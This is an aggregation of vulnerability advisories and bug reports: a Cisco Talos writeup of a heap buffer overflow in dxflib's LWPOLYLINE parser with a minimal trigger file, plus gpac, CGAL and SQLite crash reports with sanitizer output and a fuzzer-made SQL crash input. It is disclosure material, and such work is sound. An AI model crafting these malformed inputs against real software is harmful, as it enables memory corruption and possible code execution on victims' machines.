A code execution vulnerability exists in the DL_Dxf::handleLWPolylineData functionality of Ribbonsoft dxflib 3.17.0. A specially-crafted .dxf file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A code execution vulnerability exists in the DL\_Dxf::handleLWPolylineData functionality of Ribbonsoft dxflib 3.17.0. A specially-crafted .dxf file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Ribbonsoft dxflib 3.17.0

**Product URLs**

https://www.qcad.org/en/90-dxflib

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-191 - Integer Underflow (Wrap or Wraparound)

**Details**

dxflib is a C++ library utilized by QCAD, kicad, and other CAD software to parse DXF files for reading and writing. The DXF file fomat was originally created in 1982 by AutoCAD, and fills the same roll as the newer .dwg file format, mainly describing objects to be drawn.

The .dxf file fomat itself is rather simple, consisting solely of groupCode, groupValue pairs, separated by a newline. For example:

    0        // groupCode:  0 => new entity
    SECTION  // groupValue: 'SECTION' => type of the new entity
    2        // groupCode
    HEADER   // groupValue
    9        // groupCode
    $ACADVER // groupValue
    

Each groupCode acts like an opcode, and the groupValue is put to an opcode-specific purpose. The backtrace of the codeflow handling this looks like:

    #0  DL_Dxf::processDXFGroup (this=?, creationInterface=?, groupCode=?, groupValue=...) at dl_dxf.cpp:366                         //[1]
    #1  0x00007fb91bf89814 in DL_Dxf::readDxfGroups (this=0x61c000000080, fp=0x615000000580, creationInterface=?) at dl_dxf.cpp:187  //[2]
    #2  0x00007fb91bf8955e in DL_Dxf::in (this=0x61c000000080, file=..., creationInterface=?) at dl_dxf.cpp:118                      //[3]
    

Whereby DL_Dxf::in\[3\] reads a file and loops DL_Dxf::readDxfGroups\[2\] until it fails. DL_Dxf::readDxfGroups just loops and converts the next two lines of the file (i.e. the next groupCode and groupValue) into digits and then passes them to DL_Dxf::processDXFGroup, which does the groupCode/groupValue specific processing. A quick example of what this looks like:

    bool DL_Dxf::processDXFGroup(DL_CreationInterface* creationInterface,
                                 int groupCode, const std::string& groupValue) {
    
    // [...]
    
    // Indicates comment or dxflib version:
    if (groupCode==999) {
        if (!groupValue.empty()) {
            if (groupValue.substr(0, 6)=="dxflib") {
                libVersion = getLibVersion(groupValue.substr(7));
            }
    
            addComment(creationInterface, groupValue);  // [1]
        }
    }
    

While most of this code is self-explanatory, the line at \[1\] is not. The addComment function calls a function defined by the creationInterface, an object that is defined by whatever program is importing dxflib. This point is made only to say that any function starting with add* is defined by the program importing dxflib, not by dxflib itself. As such, we ignore all these functions. Everything else that gets processed by dxflib can be found below (all the handle* functions):

       // Group code does not indicate start of new entity or setting,
        // so this group must be continuation of data for the current
        // one.
        if (groupCode<DL_DXF_MAXGROUPCODE) {
    
            bool handled = false;
    
            switch (currentObjectType) {
            case DL_ENTITY_MTEXT:
                handled = handleMTextData(creationInterface);
                break;
    
            case DL_ENTITY_LWPOLYLINE:
                handled = handleLWPolylineData(creationInterface); // [1]
                break;
    
            case DL_ENTITY_SPLINE:
                handled = handleSplineData(creationInterface);
                break;
    
            case DL_ENTITY_LEADER:
                handled = handleLeaderData(creationInterface);
                break;
    
            case DL_ENTITY_HATCH:
                handled = handleHatchData(creationInterface);
                break;
    
            case DL_XRECORD:
                handled = handleXRecordData(creationInterface);
                break;
    
            case DL_DICTIONARY:
                handled = handleDictionaryData(creationInterface);
                break;
    
            case DL_LINETYPE:
                handled = handleLinetypeData(creationInterface);
                break;
    
            default:
                break;
            }
    
            // Always try to handle XData, unless we're in an XData record:
            if (currentObjectType!=DL_XRECORD) {
                handled = handleXData(creationInterface);
            }
    
            if (!handled) {
                // Normal group / value pair:
                values[groupCode] = groupValue;
            }
    

For this writeup we deal with the handleLWPolylineData function at \[1\], which handles structures constising of four vertices represented by doubles. To proceed, the function and then an example LWPOLYLINE:

    bool DL_Dxf::handleLWPolylineData(DL_CreationInterface* /*creationInterface*/) {
    // Allocate LWPolyline vertices (group code 90): // [1]
    if (groupCode==90) {   
        maxVertices = toInt(groupValue);
        if (maxVertices>0) {
            if (vertices!=NULL) {
                delete[] vertices;
            }
            vertices = new double[4*maxVertices]; // [2]
            for (int i=0; i<maxVertices; ++i) {
                vertices[i*4] = 0.0;
                vertices[i*4+1] = 0.0;
                vertices[i*4+2] = 0.0;
                vertices[i*4+3] = 0.0;
            }
        }
          
        vertexIndex=-1;
        return true;
    
    }
    
    // Process LWPolylines vertices (group codes 10/20/30/42):
    else if (groupCode==10 || groupCode==20 ||
             groupCode==30 || groupCode==42) {
    
        if (vertexIndex<maxVertices-1 && groupCode==10) {
            vertexIndex++;
        }
    
        if (groupCode<=30) {
            if (vertexIndex>=0 && vertexIndex<maxVertices) {
                vertices[4*vertexIndex + (groupCode/10-1)] = toReal(groupValue); // write one of the first 3 vertex 
            }
        } else if (groupCode==42 && vertexIndex<maxVertices) { // vertexIndex is signed, can be -1...
            vertices[4*vertexIndex + 3] = toReal(groupValue);  // oob write here, fully controlled value
        }
        return true;
    }
    return false; }
    

Once we see an opcode of 90 \[1\], we allocate a buffer times the next value. Once this buffer has been allocated, we can process further, writing into the buffer with opcodes 10, 20, 30, and 42, each different opcode changing which index to write to. Thus, in the below example, we’d write 1, 2, 3, and 1094795585 to the second set of vertices in the buffer:

    0
    LWPOLYLINE
     90
    4
     10
    1
     20
    2
     30
    3
     42
    1094795585
    

Something worth noting: when we allocate a buffer via opcode 90, our vertexIndex is assigned -1, and if we omit the groupCode of 10 from our LWPOLYLINE object, we will skip the following section of code:

        if (vertexIndex<maxVertices-1 && groupCode==10) {
            vertexIndex++;
        }
    

Thus, with a LWPOLYLINE looking something like:

    0 
    LWPOLYLINE
     90
    4  
     42
    1094795585
    

We allocate a buffer (4 \* 4 \* sizeof(double)), but then immediately hit the opcode 42 branch:

        } else if (groupCode==42 && vertexIndex<maxVertices) { // [1]
            vertices[4*vertexIndex + 3] = toReal(groupValue);    // [2]
        }
    

Since both vertexIndex and maxVertices are signed integers, the check becomes -1 < (value_we_control), which will always pass for any positive value we give for maxVertices in opcode 90. Thus, when we get to \[2\], we end up writing a value we control to vertices[(4*-1)+3], which results in an OOB heap write to the first eight bytes before the heap chunk’s data. Depending on the heap implimentation, overwriting this space can very quickly lead to code execution.

**Crash Information**

    ==215422==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6210000050f8 at pc 0x7ffff7d51476 bp 0x7fffffffd150 sp 0x7fffffffd148                                                                                                                   [143/343]
    WRITE of size 8 at 0x6210000050f8 thread T0      
    [Detaching after fork from child process 215427]                 
        #0 0x7ffff7d51475 in DL_Dxf::handleLWPolylineData(DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:1455:41
        #1 0x7ffff7d4235e in DL_Dxf::processDXFGroup(DL_CreationInterface*, int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:708:27
        #2 0x7ffff7d41813 in DL_Dxf::readDxfGroups(_IO_FILE*, DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:187:9
        #3 0x7ffff7d4155d in DL_Dxf::in(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:118:16
        #4 0x554ec7 in LLVMFuzzerTestOneInput (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x554ec7)
        #5 0x45aa01 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x45aa01)
        #6 0x446172 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x446172)
        #7 0x44bc26 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x44bc26)
        #8 0x4748e2 in main (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x4748e2)
        #9 0x7ffff79a40b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x42083d in _start (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x42083d)
    
    0x6210000050f8 is located 8 bytes to the left of 4736-byte region [0x621000005100,0x621000006380)
    allocated by thread T0 here:                                                                                                       
        #0 0x54fdcd in operator new[](unsigned long) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x54fdcd)
        #1 0x7ffff7d510cc in DL_Dxf::handleLWPolylineData(DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:1430:24
        #2 0x7ffff7d4235e in DL_Dxf::processDXFGroup(DL_CreationInterface*, int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:708:27
        #3 0x7ffff7d41813 in DL_Dxf::readDxfGroups(_IO_FILE*, DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:187:9
        #4 0x7ffff7d4155d in DL_Dxf::in(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, DL_CreationInterface*) /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:118:16
        #5 0x554ec7 in LLVMFuzzerTestOneInput (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x554ec7)
        #6 0x45aa01 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x45aa01)
        #7 0x446172 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x446172)
        #8 0x44bc26 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x44bc26)
        #9 0x4748e2 in main (/root/boop/assorted_fuzzing/kicad/dxflib/dxf_fuzzer.bin+0x4748e2)
        #10 0x7ffff79a40b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /root/boop/assorted_fuzzing/kicad/dxflib/dxflib-3.17.0-src/src/dl_dxf.cpp:1455:41 in DL_Dxf::handleLWPolylineData(DL_CreationInterface*)
    Shadow bytes around the buggy address:
      0x0c427fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
      0x0c427fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
      0x0c427fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
      0x0c427fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
      0x0c427fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
    =>0x0c427fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
      0x0c427fff8a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
      0x0c427fff8a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
      0x0c427fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
      0x0c427fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
      0x0c427fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==215422==ABORTING
    [Thread 0x7ffff3179700 (LWP 215426) exited]
    [Inferior 1 (process 215422) exited with code 01]
    

**Timeline**

2021-08-04 - Vendor Disclosure  
2021-08-21 - Follow up with vendor  
2021-08-27 - Vendor patched

2021-09-07 - Public Release

Discovered by Lilith >\_> of Cisco Talos.

CVE-2021-21897: TALOS-2021-1346 || Cisco Talos Intelligence Group

An issue was discovered in gpac 0.8.0. The gf_odf_del_ipmp_tool function in odf_code.c has a heap-based buffer over-read.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

in odf\_code.c line3295 The check for size here may have some problems.It will cause a heap overflow.And it will resulting in gf\_odf\_del\_ipmp\_tool to free a invalid address.  
Here is the asan's result:

    [ODF] Error reading descriptor (tag 3 size 0): Invalid MPEG-4 Descriptor
    =================================================================
    ==19708== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602c0000ff68 at pc 0x7f448e47044d bp 0x7ffd384c3670 sp 0x7ffd384c2e30
    WRITE of size 16 at 0x602c0000ff68 thread T0
        #0 0x7f448e47044c (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0xe44c)
        #1 0x43efa1 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x43efa1)
        #2 0x56cd48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cd48)
        #3 0x562335 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x562335)
        #4 0x56d4c7 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56d4c7)
        #5 0x6d4b48 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x6d4b48)
        #6 0x51d2ab (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d2ab)
        #7 0x51d814 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x51d814)
        #8 0x524cb5 (/home/lcy/gpac-master/bin/gcc/MP4Box+0x524cb5)
        #9 0x525b2e (/home/lcy/gpac-master/bin/gcc/MP4Box+0x525b2e)
        #10 0x41cb6b (/home/lcy/gpac-master/bin/gcc/MP4Box+0x41cb6b)
        #11 0x7f448d75bf44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44)
        #12 0x40f2fd (/home/lcy/gpac-master/bin/gcc/MP4Box+0x40f2fd)
    0x602c0000ff68 is located 0 bytes to the right of 360-byte region [0x602c0000fe00,0x602c0000ff68)
    allocated by thread T0 here:
        #0 0x7f448e47741a (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0x1541a)
        #1 0x56cb6d (/home/lcy/gpac-master/bin/gcc/MP4Box+0x56cb6d)
    Shadow bytes around the buggy address:
      0x0c05ffff9f90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffff9fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffff9fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffff9fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c05ffff9fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c05ffff9fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa
      0x0c05ffff9ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffffa000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffffa010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffffa020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c05ffffa030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:     fa
      Heap righ redzone:     fb
      Freed Heap region:     fd
      Stack left redzone:    f1
      Stack mid redzone:     f2
      Stack right redzone:   f3
      Stack partial redzone: f4
      Stack after return:    f5
      Stack use after scope: f8
      Global redzone:        f9
      Global init order:     f6
      Poisoned by user:      f7
      ASan internal:         fe
    ==19708== ABORTING

CVE-2020-19751: in odf_code.c line3295 have a heap-buffer-overflow · Issue #1272 · gpac/gpac

A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1 in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Sloop_of OOB read. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger this vulnerability.

CVE-2020-35635: TALOS-2020-1225 || Cisco Talos Intelligence Group

** DISPUTED ** A segmentation fault can occur in the sqlite3.exe command-line component of SQLite 3.36.0 via the idxGetTableInfo function when there is a crafted SQL query. NOTE: the vendor disputes the relevance of this report because a sqlite3.exe user already has full privileges (e.g., is intentionally allowed to execute commands). This report does NOT imply any problem in the SQLite library.

**Describe**

There is a segmentation fault in idxGetTableInfo,causing sqlite3 crashed.

**VERSION**

git-master (commit 9d41caf361ea37e7bb91c3e0635bd9dca9f06040)

trunk (8c432642572c8c4b7251f413def0725b3b8e9e7fe10230aa0aabe86b58e5902d)

date: 2021-07-07 19:44:32

**System info**

Ubuntu 18.04.5 LTS

clang version 10.0.0

**POC content**

    create TEMP  table t1(allint);1;
    CREATE TRIGGER t02AFTER DELETE ON t1
    WHEN EXISTS ( SELECT 1 FROM t0 WHERE o00.x0= y5)
    BEGIN
    INSERT INTO t0 VALUES(o00.x);
    END;
    C@EATE TABLE a0(y RE FM t1 
    CREATE TRIGGER t00 AFTER DELETE ON t1
    WHE0)FROM t1;
    INSERT INTO t1 SELECT x+8,randomblb(400)FROM t1;
    INSERT INTO t1 SELECT x+16,randomblob(400)FROM t1;
    INSERT INTO t1 SELECT x+32,randomblob(400)FROM t1;
     INTO t1 VALUES(74,raOM t1;   /*  16 */
    SZVEPOINT one;
    INSERT INTO t120) null, L000000000000000礸t(20WAL;
    PRAGMA cache_size = 10;
    CREATE TABLE t1120) null, L000000000000000 text(20) null, U000, U000000000000000>text(300) nullC L00000000000000D text(50) nulldomblob(800) FROM t1;   /*   2 */
    INSERT INTO t1 SELECT randomblob(8ll, P000000 text(50) n*/                                                                                                                                                                                                                   ÿSERT INTO t1 SELECTGrandomblob(802001%112010) FROM t1;  ;/*   8 */
    INSERT INTO tH SELECT randomblob(000) FROM t1;   /*  16 */
    SZVEPOINT one;
    INSERT INTO t120) null, L000000000000000 text000D text(50) null, F00000000000 text(100) not null,*R0000000 int not null, S00000000) not null, A0000000000 text(30) not null, L0000000 text(200) not null, A00000000000000000 int not null, R00000 int not null, N000000000000 text(1) nÿl, N0000000000000 text(1) null, N00000000 text(1) null, N000000E00000000 text(1) null, N000000000000ÿÿ0 
    CREATE TABLE T00(C00 inX000)0,S0000 int not null, L00000000000000 text(50) not nukl, P000000 text(50) null, ISSUEID text(50) not null, OB0ECTID text(50) not null, R0000000000 int not null, C0000000000 text(50) not nulR, A0000000 text(50) not null, C000 text(20) null, L0 CROM t1;   /*   2 */ U000 int00000, P00000000000000 int00000, L000000 int00000, L00000000 int00000, U000000000M int00000, L000000 int00000, L0ERT INTO t1 VALUES(randomblob(800));t SELECT randomblob(800
    INSERT INTO t1 SELECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA cachepoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
     FROM t1;   /*   2 */ randomblob(800
    INSERT INTO t1 SELECT randomblob(800
    PRAGMA wl_checkpoint;
    INSERT INTO t1 VALUES(randoMblob(800));VACUUM;
    INSEme;
    ATTACH'merory:' AS noname;AL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkAS noname;
    ATTACH'merory:' AS inmǭJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cachb_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(rd null, C0000000000 text(50) not null, A00000nmǭJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
    INSERT INT- tÿÿÿme;
    ATTACH'merory:' AS inm§mJ±;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = WAL;
    PRAGMA cache_size= V0;CREATE T0;
    CREATE TABLEÿÿx PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INTO t1 VALUES(randomblob(800));VACUUM;
     CROM t1;   /*   2 */ randomblob(800
    INSERT INTO t1 SELECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA caory:' AS inm§mJ±;
    PRAGMA tage_size = 1RAGMA journal_mode = WAL;2 */
    INSERT INTO t1 SELECT randomblob(800
    PRAGMA wl]checkpoint;
    IN ERT INTO t1 VALUES(randoMblob(800));VACUUM;
    INSERT INTO t1 SEme;
    ATTACH'merory:' AS noname;
    ATTACH'merory:' AS A cache_size;
    PRAGMA tage_size = 1024;
    PRAGMA journal_mode = lAL;
    PRAGMA cache_s10) FROM t1; ATE T0;
    CREATE TABLE t1TTACH'merory:' AS 0;
    CREATE TABLE tF(x PRIMARY KEY);
    PRAGMA wal_chBckpoint;
    INSERT INTO t1ALUES(randomblob(800));VA 
    ώώώ
       J
    /
    .expe
          -
    -s 1:
    /
    .expώώώώώώώώώώώώώώώώώώώώώώLECT randomblob(800) FROM t1;   /*  RT = WAL;
    PRAGMA cache_size= V0;CREA0;
    AREATE TABLE t1(x PRIMARY KEY);
    PRAGMA wal_checkpoint;
    INSERT INinmGmJme;
    
    

**ASAN OUTPUT**

    ==46696==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f2d6f5974e1 bp 0x7ffeecd46930 sp 0x7ffeecd460e8 T0)
    ==46696==The signal is caused by a READ memory access.
    ==46696==Hint: address points to the zero page.
        #0 0x7f2d6f5974e1  /build/glibc-S9d2JN/glibc-2.27/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65
        #1 0x42f058 in strlen /home/brian/src/final/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc
        #2 0x5282b8 in idxGetTableInfo (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5282b8)
        #3 0x4d3091 in idxCreateVtabSchema (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d3091)
        #4 0x4d27e4 in sqlite3_expert_new (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4d27e4)
        #5 0x5426f5 in expertDotCommand (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x5426f5)
        #6 0x4e3df0 in do_meta_command (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4e3df0)
        #7 0x4fbe79 in process_input (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4fbe79)
        #8 0x4dc0c7 in main (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x4dc0c7)
        #9 0x7f2d6f42abf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #10 0x41c579 in _start (/zhengjie/Focuser/program/unifuzz/sqlite/crash/build/sqlite3+0x41c579)

Tag

#c++